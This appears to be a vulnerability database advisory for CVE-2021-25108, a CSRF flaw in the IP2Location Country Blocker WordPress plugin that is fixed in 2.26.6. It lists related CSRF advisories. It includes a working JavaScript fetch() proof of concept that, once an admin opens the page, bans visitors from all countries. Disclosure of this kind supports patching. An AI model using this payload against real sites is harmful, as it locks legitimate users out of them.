IP2Location Country Blocker < 2.26.6 – Arbitrary Country Ban via CSRF | CVE 2021-25108 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in the ip2location_country_blocker_save_rules AJAX action, allowing attackers to make a logged in admin block arbitrary country, or block all of them at once, preventing users from accessing the frontend.

Proof of Concept

Make an admin open a page with the following code in it, which will ban visitors from all countries:

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action":"ip2location_country_blocker_save_rules", "countries[]": "nonexistent", "mode": 0}),
  "method": "POST",
  "credentials": "include"
})
  .then(response => response.text())
  .then(function(data) { console.log(data); });

Affects Plugins

ip2location-country-blocker

Fixed in 2.26.6

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2653459

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

9d416ca3-bd02-4fcf-b3b8-f2f2280d02d2

Timeline

Publicly Published

2022-01-06 (about 2 years ago)

Added

2022-01-06 (about 2 years ago)

Last Updated

2022-04-08 (about 2 years ago)

Other

Published

Title

Published

2021-10-04

Title

Easy PayPal Buy Now Button < 1.7.3 - CSRF to Stored Cross-Site Scripting

Published

2022-04-28

Title

Hermit <= 3.1.6 - Arbitrary Cache/Source Deletion & Source Creation via CSRF

Published

2024-01-16

Title

Better Anchor Links <= 1.7.5 - Cross-Site Request Forgery via admin/options.php

Published

2023-09-04

Title

MyCryptoCheckout < 2.126 - CSRF

Published

2024-01-12

Title

InstaWP Connect < 0.1.0.9 - Cross-Site Request Forgery via create_file_db_manager